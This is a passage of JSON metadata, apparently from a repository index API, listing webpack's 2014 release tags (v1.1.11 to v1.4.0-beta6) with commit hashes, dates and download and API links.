.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.g